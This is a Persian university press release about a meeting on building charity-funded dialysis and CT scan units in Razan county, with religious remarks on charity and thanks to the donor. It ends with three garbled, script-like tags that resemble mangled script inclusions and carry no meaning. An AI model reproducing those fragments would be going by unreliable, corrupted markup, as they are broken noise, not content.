معاون توسعه مدیریت و منابع دانشگاه خبر داد:

پروژه خیرساز دیالیز و سی تی اسکن شهرستان رزن در نیمه ماه مبارک رمضان به بهره برداری خواهد رسید

جلسه بررسی ساخت و راه اندازی بخش های خیرساز دیالیز و سی تی اسکن شهرستان رزن با حضور معاون توسعه مدیریت و منابع دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه بررسی ساخت و راه اندازی بخش های خیرساز دیالیز و سی تی اسکن شهرستان رزن با حضورمهندس رحیمی معاون توسعه مدیریت و منابع، مهندس طاهری مدیر دفتر فنی و منابع فیزیکی دانشگاه، دکتر جباری مدیر شبکه بهداشت و درمان رزن و حاج آقا دوستی، یکی از خیرین نیک اندیش شهرستان رزن برگزار شد.

مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه با اشاره به فرموده پیامبر گرامی اسلام در خصوص اعمال خیرافزود: پیامبر گرامی اسلام، حضرت محمدبن عبداللّه صلی الله علیه و آله وسلم در خصوص اقدامات خیر خواهانه برای دستگیری مردم از مشکلات فرموده اند: کسی که به فریاد برادر و خواهر مسلمانش برسد و او را از غصه، گرفتاری و خطری نجات دهد، خداوند ده کار نیک برای او می نویسد، ده درجه او را بالا می برد و ثواب آزاد کردن ده بنده را به او عطا می فرماید. ده عقوبت را از او دور می نماید و در روز قیامت ده شفاعت برایش آماده می سازد.

وی همچنین در ادامه افزود:ساخت پروژه های خیرساز مخصوصا در حوزه سلامت گره گشایی از دردمندان، نیازمندان و بیمارانی است که مشکلات فراونی دارند و این عمل خیر، باقیات صالحاتی برای خانواده شخص خیر بر جای میگذارد.

مهندس رحیمی ضمن تاکید بر ساخت و تجهیز به موقع پروژه خیرساز بخش دیالیز و سی تی اسکن شهرستان رزن بیان کرد: با همت و نیک اندیشی حاج آقا دوستی، یکی از خیرین بزرگوار و ارزشمند شهرستان رزن، در تلاش هستیم که دو بخش مذکور تا نیمه ماه مبارک رمضان به بهره برداری برسد.

معاون توسعه مدیریت و منابع دانشگاه افزود: کار خیر همیشه ماندگار خواهد ماند و در پیشگاه خداوند بسیار ارزشمند است و از قدیم الایام یاد می شود که دستی که کمک می کند از دستانی که برای دعا بالا می روند مقدس تر است.

در پایان مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه از حاج آقا دوستی، خیر نیک اندیش رزنی، بابت اقدام خیرخواهانه ایشان و همچنین از زحمات دکتر جباری در خصوص تلاش در روند ساخت و تجهیز دو بخش دیالیز و سی تی اسکن شهرستان رزن تقدیر کرد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>